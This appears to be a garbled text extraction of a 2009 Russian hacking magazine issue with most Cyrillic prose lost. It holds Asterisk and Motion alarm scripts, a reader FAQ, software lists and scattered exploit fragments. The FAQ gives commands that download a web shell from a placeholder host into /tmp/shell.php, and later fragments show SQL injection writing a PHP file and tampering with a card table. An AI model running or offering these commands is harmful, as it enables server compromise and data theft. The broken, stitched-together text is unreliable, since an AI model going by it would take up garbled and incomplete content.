/etc/motion/motion.conf ,
,
z 2008 . :
$ sudo nano /etc/motion/motion.conf
# -,
webcam_port 8000
webcam_motion on
webcam_localhost off
webcam_quality 30
webcam_maxrate 6
control_authentication username:password
# ,
, on_motion_detected
on_event_start
on_motion_detected /usr/bin/webcam_event.sh
, Motion 'n':
$ motion n
Thread is from /etc/motion/motion.conf
,
webcam_event.sh:
$ sudo nano /usr/bin/webcam_event.sh
#!/bin/sh
cat << EOF > /tmp/alarm.call
# CallerID
115
>> SYN/ACK
Channel: SIP/admin
Callerid: 11111111
# ,
(..
3 )
MaxRetries: 2
# ( 300 )
RetryTime: 30
# ( 45 )
WaitTime: 30
# extensions.conf
Context: alarm
Extension: s
Priority: 1
EOF
#

chown asterisk:asterisk /tmp/alarm.call
mv /tmp/alarm.call /var/spool/asterisk/outgoing/
, Call-. timestamp:
Set: timestamp=20091023104500
extension.conf:
$ sudo nano /etc/asterisk/extension.conf
[alarm]
116
exten
exten
exten
exten
exten
=>
=>
=>
=>
=>
s,1,Answer()
s,n,Wait(2)
s,n,Playback(activated)
s,n,Wait(1)
s,n,Hangup()
dialplan reload. , , Motion

webcam_event.sh, /tmp/alarm.call
/var/spool/asterisk/outgoing. Call- Asterisk, admin, sip.conf,
CallerID 11111111. , Asterisk , , e-mail
SMS. , Motion ,
.
, Asterisk,
. , Motion , .
cron,
/ . ,
Motion:
$ sudo nano /usr/bin/motion.sh
#!/bin/sh
case $1 in
X 04 /124/ 09
>> SYN/ACK
extensions.conf
start)
/usr/bin/motion
;;
, Asterisk
stop)
PID='pidof motion'
kill $PID
killall webcam_event.sh
rm
-f
/var/spool/asterisk/outgoing/
alarm.call
;;
esac
extension.conf , :
$ sudo nano /etc/asterisk/extension.conf
exten => *001,1,Answer()
exten => *001,n,Playback(activated)
exten
=>
*001,n,System(/usr/bin/motion.sh
start)
exten => *001,n,Hangup()
exten
=>
*002,n,System(/usr/bin/motion.sh
stop)
exten => *002,n,Playback(de-activated)
, Motion,
*001, *002.
ASTERISK *nix
( ,
: sleep 20m && mpg123 ~/bell.mp3),
- .
asterisk wakeup , ,
. PHP-
wakeup.php, (www.
voip-info.org/liberty/view/file/2388).
tar-, php- AGI- (Asterisk Gateway Interface ,
Asterisk) : chmod
a+x /var/lib/asterisk/agi-bin/wakeup.php (
, astagidir
asterisk.conf).
wakeup.php , :
; PHP *nixX 04 /124/ 09

#!/usr/bin/php -q
; /tmp
$parm_error_log = '/var/log/asterisk/wakeup.log';
; /
tmp,
, wakeup.php , :
$parm_temp_dir = '/var/spool/asterisk/tmp';
Motion
extensions.conf :
exten => *97,n,AGI(wakeup.php)
*97 , . , 17:55 (
:)), 0555,
2 (1 , 2 ).
,
php5-cli asterisk-sound-extra
fromdos, wakeup.php Unix-.

Asterisk asterisk-sounds
1000 ( Allison Smith). // ,
Audacity.

*98 /tmp myrecord.wav. ( #) , . :
, ,
//,
, VoIP-.
info

IVeS (

videocodec_nego_fix_
ast-1.4.13.patch.gz),

,

Digium.
video

Asterisk:
,
, .

exten => *98,n,Wait(2)
117
>> .PRO
SYN/ACK
Asterisk: 1.4 1.6
exten
exten
exten
exten
exten
=>
=>
=>
=>
=>
*98,n,Record(/tmp/myrecord%d:wav)
*98,n,Wait(1)
*98,n,Playback(${RECORDED_FILE})
*98,n,Wait(1)
*98,n,Hangup()
/ Asterisk , privetstvie.wav. ,
gsm/mp3/ogg,
.

, .
, ,
. . Directory(), , ,
.
, ,
118
Motion
, :
exten => *99,1,Directory(default,internal)
voicemail.conf:
[default]
401 => 1234,Andrey Matveev,andrushock@real.xakep.ru
*99, , (
mat). Allison Smith voicemail.conf
: a-n-d-r-e-y m-a-t-v-e-e-v. 1. 401 (
exten => _XXX,1,SayDigits(${EXTEN})) .
!
? , : ,
100 . , X 04 /124/ 09
>>
>>SYN/ACK
.PRO
( )
?
SayUnixTime(), :
exten
exten
exten
exten
=>
=>
=>
=>
*100,1,Answer()
*100,n,SayUnixTime(,,QdhAR)
*100,n,WaitMusicOnHold(10)
*100,n,Goto(*100,1)
*100, Allison Smith ,

1 , , 14 50 .
10- (
directory
musiconhold.conf), ( , - ).

,
. , VoIP- Ekiga
, , allow=ilbc
allow=h264
. , Asterisk
allow=h261
1.4 (
, , , ..). , 384 /, , Asterisk, , - maxcallbitrate.
. , - , Asterisk TOS
ffmpeg, - (Type of Service) IP-, app_transcoder (sip.fontventa. , com/content/view/30/57), ffmpeg TOS . sip.conf , . tos_sip, tos_audio tos_video TOS-
1.6 SIP-, - .
, , tos_video=af41
( Asterisk),
.
iax.conf TOS
SIP IAX2. - :
(chan_h323, chan_oh323, chan_ooh323)
tos=0x18
H.323 ,
H.323 . ,
, - sip.conf :
-: Ekiga, Bria, X-lite, Linphone, Milliphone,
WengoPhone, Windows Messenger .
[general]
videosupport=yes
IAX , videosupport iax.conf .

, , :
H.261 ( ), H.263, H.263p H.264 (
Asterisk 1.4). Asterisk 1.4 , .
,
disallow=all. ,
.
disallow=all
allow=alaw
allow=gsm
allow=speex
X 04 /124/ 09

Asterisk? ,
,
( ,
), -,
, , , ( Asterisk + Festival),
, (,
, , VPN- , , ,
IP-
, , VoIP-). ,
- :). z
links

Asterisk
Asterisk
auto-dial out
www.voip-info.org/
wiki-Asterisk+autodial+out.

,
,
Asterisk-Video
(lists.digium.com/
pipermail/asteriskvideo).
119
>> units

/ LOZOVSKY@GAMELAND.RU /
PSYCHO:
(2009, VHSRIP)
][-
, ,
, ,
psycho .
,
. ( ) . , ,
- ,
,
( ).
, .
, .
, ,
,

.

, . :
/ ;
.
,
, . ,
,
, ,
.
! !
.
,
. ( ,
) (
, ,
, ).
,
, , , , ,

;
- ( ,
), ,
,
. -
120
, (, ,
) . ,
. !
: .
. .
,
( , ).
.
,
.
.
. .
, . -

:). , ,
, , ,
,
- (, , ).

. , , ,
. ,
( )
.

.
( ), . , ,
. ?
, , ,
? ,
,
(95%
). ( , ),
X 04 /124/ 09
>> units

10-
( .., ). 3- ? , !
1. .
2. , , .
3. ,
.
4. .
5.
.
6. , .
, (
;)).

. ( ,
, ).

, ,
. ,
,
,
. ,
,
, , !
( , -)
,
, . ?
, :
/
,
- , ,
X 04 /124/ 09
,
,

. , ,
.

,
( )

,
.
, ,
(
).

:)
.
?
: , , ,
- . , ,
. ,
.
, , ,
. ,
.
(, ?), , .
,
, ,
. , :).
z, SINteze, , ,
, ,
( ?)
.

. -
121
>> units
, :)
, . , ?
, (-,
, , ) .
, !
, , ?
. ,
, :
- , ,
, , . , .

, , , :). -
, , , ,
- ,
, , ,
-
. , ,
(
, , ..).

-, , ...,
,
, .
11- 1-

.. , . ,
. ,
.
. ,
, .
z ? ,
..
,
. , ,
. .
z ?
z ,
? , - ?
.. , ,
, - - (, ,
-, ).
.. ,
.
z ?
.. .
z , .
, ?
.. (
, . .). -
: , ,
(), ,
, , , / .
? , , ,
122
, -, , (, !), ,
(
). ,

( 90% ),
, :
, ,
(
; , ,
X 04 /124/ 09
>> units
( )
, ,

, ).
- .
, , .
, , , , (
), . ,
, , .
, , ,
,
4-8
. ? .
, . ,
... , . , , ,
?. ,
. ,
, ,
, (
. - ? ! ) ,
. . , . z
, , ,
( , , )
.
, ,
. , ,
, ,
? . .
,
.
( ) ,
(
).
X 04 /124/ 09
: . ,

. (
i), , , .
,
, , , 10 ,
3-5, .
, ()
(, ).
, ,
, ,
. , . -
, .
. , ,
, .
,
.
, , 2-3
.
.
. , ,
!
(-, !).
, . ,
(
). ,
, , . ,
.
. (love drug), , ,
. , - . , -
. .

.
123
>> units
/ ICQ 884888 /
FAQ UNITED:
Q: php- ( ) . ?
A:
, ,
, turnkeyhero.com/
replacer_tester.php spinnertool.com, . .
:
You Can Quickly And Easily Rewrite
Your Content And Drive More And
More Ultra-Responsive Targeted
Traffic To Your WebSite Even If
You Are A Newbie!
,
:
You Can Quickly And Colloquialism
Writing Your Accumulation And
Propulsion More And More UltraResponsive Targeted Assemblage To
Your WebSite Even If You Are A
Newbie!
124
,
?
Q: ?
A: WordPress-
,
RSS-, .
, blogspot.
com, wordpress.com ?
!
, e-mail,
RSS-,
www.rss2email.ru.
, ,
e-mail (
e-mail, ,
).
www.rss2email.ru
.
, , ,
:).

Yahoo Pipes (pipes.yahoo.com),
RSS-,

-, .
,
-: ,
,
,
.
(z#110).
Q: , ,
?
A: ! Start Run
ipconfig .
NAT, IP:
10.0.0.0 10.255.255.255
172.16.0.0 172.31.255.255
192.168.0.0 192.168.255.255
Q: n
?
A: , Lopa.

: My Computer Manage Local users and
groups Users
X 04 /124/ 09
>> units
Properties Sessions.
Never. Run
tscc.msc RDP :
net accounts /forcelogoff:no
net accounts /maxpwage:unlimited
Q: -
. ?
A: ,
LiveStreet (http://
livestreet.ru) (aka ort).
:
UTF-8

, , ,
, , ,

(ACL)
(
, ..)

-
-

e-mail
, ,
VKontakte.ru,
. API ,

userapi.com.
Q: ,
file_exists(). ?
A: ! .Slip (
!). ,
X 04 /124/ 09
, PHP 5.0.0, file_exists()

.
ftp://, php://memory, php://
temp, ssh2.sftp://.
true!
<?php
echo file_exists("ftp://user:pwd@
host/shell.txt");
?>
- .Slip:
http://forum.antichat.ru/thread99589.html.
Q: - psd.
css html?
.
A: - http://
www.psd2cssonline.com.
,
:
1. .
2. 8-
RGB (16- ).
3. .
4. Psd- 4 (8 ).
www.psd2cssonline.
com/node/9.
?
Upload your
PSD
!
Q: ,
( curl
wget)?
A: :
lynx: lynx -source "http://site.
com/shell.txt" > /tmp/shell.php
links: links -source "http://site.
com/shell.txt" > /tmp/shell.php
wget: wget -O /tmp/shell.php
http://site.com/shell.txt
GET: GET http://site.com/perl.txt
> /tmp/shell.php
fetch: fetch -o shell.php http://

site.com/shell.txt
curl: curl --output shell.php
http://site.com/shell.txt
Q: ! ?
A: Offline NT Password &
Registry Editor (home.eunet.no/~pnordahl/
ntpasswd).
:
,

Windows NT/2k/XP/
Vista

offline,

, CD

!
Q: md5-, , ,
.
?
A:
: http://rainbowtables.shmoo.com.
rainbow tables:
1. ;
2. +
;
3. + + .
( ) RainbowCrack 1.2 (http://www.antsight.
com/zsl/rainbowcrack).
rainbow
:
[ABCDEFGHIJKLMNOPQRSTUVWXYZ] 610
MB (8353082582 );
[ABCDEFGHIJKLMNOPQRSTUVWXYZ012345
6789] 3 GB (80603140212 );
125
>> units
56789!@#$%^&*()-_+= ] 24
GB (915358891407 );
123456789!@#$%^&*()-_+=~'[]
{}|\:;"'<>,.?/ ] 64 GB
(7555858447479 );
[abcdefghijklmnopqrstuvwxyz012
3456789] 36 GB (2901713047668
).
Q: ICQ-
- AOL.
,
?
A:
ICQ 6.5 (
), .pin. :
1. http://ru.toonel.net
Windows- , Java
( 2.0 MB);
2. ;
3. , ,
127.0.0.1;
4. 127.0.0.1 .
. 8090 ;
;
5. ,
,
, https,
localhost, 8090 ( ,
).
DNS
;
6. .
P.S. &RQ
UIN #1,
QIP Miranda. (http://andrq.org).
Q: ! ,
! ?
A:
mstsc:
mstsc /admin (, Windows XP
SP3);
mstsc /console (, Windows
XP SP2 , , ).
, Run taskmgr, :).
P.S.
126
(
)
. :
.
Q: , Hyper-V Windows7.
A: ! :
1. Remote Admin Tools
Microsoft: technet.microsoft.com/en-us/
library/cc780654.aspx.
2. Control Panel
Programs and Features Turn
Windows features on or off.
3. Hyper-V
Remote Server Administration Tools Role
Administration Tools Hyper-V Tools.
Q: PowerShell ,
regedit?

.
A: , PowerShell ,
.REG-. HKEY_LOCAL_
MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\IniFileMapping\Autorun.inf
@=@SYS:DoesNotExist, (
).
,
.
function Disable-AutoRun
{
$item = Get-Item '
"REGISTRY::HKEY_LOCAL_
MACHINE\Software\Microsoft\
Windows NT\CurrentVersion\
IniFileMapping\AutoRun.inf" '
-ErrorAction
SilentlyContinue
if (-not $item) {
$item = New-Item
"REGISTRY::HKEY_LOCAL_MACHINE\
Software\Microsoft\Windows NT\
CurrentVersion\IniFileMapping\
AutoRun.inf"
}
Set-ItemProperty $item.PSPath
"(default)" "@SYS:DoesNotExist"
}
com), USB Monitor Professional (www.

hhdsoftware.com), USBSpy 2.0 (www.everstrike.
com/usb-monitor).
.

,
.
usbmon,
USB-.

, debugfs
insmod usbmon:
mount -t debugfs none_debugs /sys/
kernel/debug
modprobe usbmon
USB-
cat:
cat /sys/kernel/debug/usbmon/1u
ASCII ,
. , . Libpcap
usbmon, , , USB-
tcpdump.

Wireshark
(www.wireshark.org).
Q:
,
?
: .
1. Firefox IE
Tab (ietab.mozdev.org) Internet
Explorer OperaView (operaview.mozdev.org)
, Opera.
2. Lunascape,
-
Trident (Internet Explorer), Gecko (Mozilla
Firefox) WebKit (Safari, Google Chrome).
www.
lunascape.tv.
Q: .EXE .DLL
(.. , )?
A: Visual Studio:
link.exe /dump /headers <.exe>
Q: ,
USB. :

USB?
A: , : USBTrace (www.sysnucleus.
Microsoft
filever.exe (http://support.microsoft.com/
kb/913111), , , :
filever.exe <.exe>
z
X 04 /124/ 09
>Net
CCNA Network Visualizer 6.0
Cookienator 2.5.32
Google Chrome 2.0.172.0
HamachiSetup 1.0.3.0
Iconix
>Multimedia
AAA Logo 2009 3.0
CamSpace 8.1
IKEA Home Planner
iTunes 8.1
LastFM 1.06
LiberTV 1.4.0.0
Microsoft WorldWide Telescope
Random MixTape Maker 1.8.27.73
SumatraPDF 0.9.3
TrackMe
Tunatic 1.0.1b
>Misc
Eyeskeeper 2.0
f.lux
Jedi Concentrate
Jedi Window Dock
NiftyWindows 0.9.3.1
OpenWithView 1.02
Process Blocker 0.5b
TaggedFrog 0.8.1
Tudumo 1.1.1.25
UbitMenu
Workrave 1.9.0
>Games
PCSX2 0.9.6
>Development
CodeLobster PHP Edition 3.0
CollabNetSubversion 1.6.0-7
E-TextEditor 1.0.30
Intype Alpha 0.3.1.547
Titanium SDK 0.3
TortoiseSVN 1.6.0
>>WINDOWS
>Dailysoft
7-Zip 4.65
AIMP 2.51
Autoruns 9.40
DAEMON Tools Lite 4.30.3
Download Master 5.5.10.1163
FarPowerPack 1.15
FileZilla Client 3.2.3.1
K-Lite Mega Codec Pack 4.75
Miranda IM 0.7.17
Mozilla Firefox 3.0.8
Notepad++ 5.3.1
Opera 9.64
PuTTY 0.60
QIP Infium RC4 Build 9030
Skype 4.04.0
Total Commander 7.04a
Unlocker 1.8.7
XnView 1.96
>>UNIX
>Desktop
2ManDVD 0.6.2
AcidRip 0.14
Archimedes 0.52.0
Avidemux 2.4.4
DigiKam 0.10
DVDStyler 1.7.2
Exaile 0.2.14
FBReader 0.10.5
Ffmpeg 0.5
Gnome 2.26
GPicView 0.1.11
>System
Avira AntiVir Personal 9
Bill2's Process Manager v3.3.0.1
Drive Backup 9.0 Express
FBackup 4.1
HD_Speed 1.5.3.64
KDE 0.9.5-0
MONyog MySQL Monitor and Advisor
3.0.4
MySQL 6.0 Alpha
Perfgraph 3.0
PortableApps.com Suite 1.5.2
RadarSync 2009
Revo Uninstaller 1.80
SQLyog 8.04
>Security
ExpanDrive 1.8.3
FileFuzz
Online Solutions Security Suite
0.8 Beta
Panda USB Vaccine 1.0.0.19
Swish 0.2.1.9
SysAnalyzer
Wireshark 1.0.6
Firefox:
CoolPreviews 2.7.2
DOM Inspector 2.0.3
Firebug 1.3.3
Flashblock 1.5.9
FoxyProxy 2.8.14
HackBar 1.3.2
NoScript 1.9.1.4
SQL Inject Me 0.4.0
Tamper Data 10.1.0
Torbutton 1.2.1
Web Developer 1.1.6
XSS Me 0.4.0
IE7Pro 2.4.5
Internet Explorer 8.0
Lunascape 5 RC1
Mikogo
Opera Turbo alpha
qutIM 0.2a
RDP Manager
The Favorite Start Page 1.77
TightVNC 1.3.10
X-Lite 3.0
Yoics for Windows 2.6.086
>Net
Amsn 0.97.2
bareFTP 0.2.1
Ekiga 3.2.0
Gajim 0.12.1
LFTP 3.7.11
Mozilla Firefox 3.0.8
Mozilla Thunderbird 2
Opera 9.64
Opera Turbo 10.0.4166 Alpha
Pidgin 2.5.5
Psi 0.12
QuickSynergy 0.9.0
qutIM 0.2 alpha
Smuxi 0.6.3
Synapse IM
Synergy 1.3.1
Tightvnc 1.3.10
>Games
Neverball 1.5.0
OpenArena 0.7.1
>Devel
Adventure PHP Framework 1.8
Anjuta IDE 2.26
bashdb 4.0.0.2
DDD 3.3.12
EiffelStudio 6.3
IntellijIDEA 8.1
MonoDevelop 1.9.3
Nasm 2.06rc8
Pango 1.24.0
Parrot 1.0
QDevelop 0.27.4
Qt 4.5.0
Qt Creator 1.0
RapidSVN 0.9.8
Ruby 1.9.1
Subversion 1.6.0
Titanium
Ruby - Aptana Studio 1.2.5
Ruby - Arcadia 0.6.0
Ruby - FreeRIDE 0.9.6
Ruby - IronRuby 0.3
Ruby - JRuby 1.2.0
Ruby - korundum 3.5.5
Ruby - qt4-qtruby 2.0.3
Ruby - Rails 2.3.2
Ruby - RubyGems 1.3.1
Ruby - wxRuby2 2.0.0
Intipunku 0.4
Jajuk 1.7.1
Medusa4 3.1.1
Octave 3.0.3
OpenOffice.org 3.0.1
PeaZip 2.5.1
Perl Audio Converter 4.0.5
Picasa 3.0 beta
sK1 0.9.0
SongBird 1.1.1
Sound Juicer 2.26.0
Xneur 0.9.3
Xvidcap 1.1.7
>X-distr
BackTrack 4 beta
Damn Vulnerable Linux 1.5
nUbuntu 8.12
STD 0.1
>System
Apcupsd 3.14.5
ATI Radeon Linux Display Drivers 9.2
Cobbler 1.4.3
Foremost 1.5.5
LDAP Account Manager 2.5.0
Lynis 1.2.4
NVClock 0.8
nVidia Linux Display Driver x86
180.29
PCSX2 0.9.6
Photorec 6.10
Qemu 0.10.1
rovclock 0.6e
>Server
Apache 2.2.11
ASSP 1.4.3.1
Asterisk 1.6.0.6
Bacula 2.4.4
DBMail 2.3.5
djbdns 1.05
Dnstop 2009.01.28
Dovecot 1.2 beta4
Icecast 2.3.2
MediaTomb 0.11
Mongoose 2.4
PostgreSQL 8.3.7
Postoffice 1.4.10
TFTP Server 1.6
Unbound 1.2.1
VideoLAN Server 0.5.6
Vino 2.26.0
>Security
Automated Password Generator
2.2.3
ClamAV 0.95
Epicwebhoneypot 1.0c
Fail2ban 0.8.3
Ferm 2.0.5
GnuPG 2.0.11
iodine 0.5.1
ITS4 Security Scanner 4-1.1.1
m0n0wall 1.3b15
Nmap 4.76
OpenVAS 2.0
RogueScanner 2.6.0.0
SILC 1.1
Snare 1.5.0
Strongswan 4.2.13
UnHash 1.0
Unhide
Wireshark 1.0.6
Tkabber 0.11.1
04(124) 2009
Sony rootkit
Slammer
Loveletter
. 26
GPS
Sasser
PC27 adaptor
Melissa
. 4

WWW.GAMER-CITY.RU
04 (124) 2009
. 52
Warezov
. 20
Storm
Nimda
. 88

TWITTER

PYTHONE
10
Mebroot
1999-2009
. 32
PC27
J3
Code red
w w w.xakep.ru
WORDPRESS
http://
WWW2
2

SCREENTOASTER
WWW.SCREENTOASTER.COM
! ,
,
, , , , ! ScreenToaster (Linux,
Windows, Mac) , , , .
? SWF,
, !
QUAKE3
QUAKE LIVE
WWW.QUAKELIVE.COM
- , Quake3 Pentium 3d- 2 FPS. :)

? iD Software, , ,
, - !
, IE
Firefox. ,
, , ..
Q3 . , : Quake Live
-.
AUDIOTAG.INFO
WWW.AUDIOTAG.INFO
: ? -
AudioTag, ,
, . ,
10-40 . AudioTag.info
.
-. : .
128
MICROSOFT LIVE SYNC

WWW.FOLDERSHARE.COM
- email,
, , ,
, : ! Foldershare,
Micrsoft,
. ,
:
Live Sync !
X 04 /124/ 09

Хакер 2009 04 PDF

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Хакер 2009 04 PDF

Оригинальное название:

Загружено:

Авторское право:

Доступные форматы

WORDPRESS

The Pirate Bay

/ .: (495) 935-7034, : (495) 780-8824

MIFRILL / MIFRILL@R EAL.XAKEP.RU /

F.E.A.R. 2: Project Origin(PC)

; Eee Box PC B206

3. Wi-Fi ASUS WL-100N, D-Link DWA645, TRENDnet TEW-624UB.

D-Link DIR-655 TRENDnet TEW-633GR

PPTP, ASUS RT-N15 ,

ASUS WL-500W, Draft N .

. PPTP- , , 20 /. WL500W NAS ,

Wi-Fi D-Link DIR655, TRENDnet TEW-633GR, ASUS

: 1xWAN (RJ-45) 10/100 /, 4xLAN (RJ-45) 10/100

: 1xWAN (RJ-45) 10/100/1000 /, 4xLAN (RJ-45)

The Subject: ILOVEYOU

Melissa MS Word 97/2000, ,

BSOD - SONY ROOTKIT

MNC, MCC, LAC, Cell ID

print 'no data in google'

CREATE PROCEDURE MyTest

SQL Server ( , , ) WITH ENCRYPTION. ,

DECLARE @ret as VARCHAR(40)

: UPDATE tbl_CCards SET

CREATE DATABASE 'backdoor'

SELECT * into dumpfile 'C:\AppServ\www\s.php' from

first.txt PasswordPro, out.txt , 127.0.0.1 IP ftp-.

$strend = ''; // ('--+', '/*', '#'),

APPLE MACOS X XNU <= 1228.X LOCAL KERNEL

# Windows 2000 SP0,1,2,3,4 (pop,pop,ret+1)= (pop,ret)

CMDLIST = ['ABOR', ALLO', 'APPE', 'CDUP', 'XCUP',

typedef struct _ftsent {

VE (COMMON VULNERABILITIES AND

: xml, html, csf, xsd schema. -

Base Score Microsoft Windows

PCI, FISMA, GLBA HIPAA)

WorldPress , ( Powered by WordPress 74 400 000

WordPress <=2.3.2 xmlrpc.php Post

WORDPRESS COMMENTS HTML SPAM VULNERABILITY

$str = mb_strcut( $str, 0, $count );

value=" " />

$wpdb->posts WHERE ID = $post_id");

Magic SEO Toolz WordPress

function wp_parse_str( $string, &$array ) {

WORDPRESS 2.5 COOKIE INTEGRITY

WORDPRESS 2.7.X ADMIN REMOTE CODE EXECUTION EXPLOIT

RSS- WordPress 2.5-2.6.5

2. $message stripslashes create_function(),

Cisco IOS Feature Navigator

Advanced Enterprise Services

IPv6***, IS-IS, IP SLAs, IBM Services,

- The image runs from ROM

: 15,7 MB (16 489 764 bytes). WinZIP

e_machine 0x002b 43,

elf header size 0x34

Head Total(b) Used(b) Free(b) Lowest(b) Largest(b)

System flash directory:

Power in from car

Asus WL-500G Deluxe

nmap O2 10.0.0.. , nmap

#~ipkg install maradns

strncpy(message, &readbuf[17], 20);

The Pirate Bay ,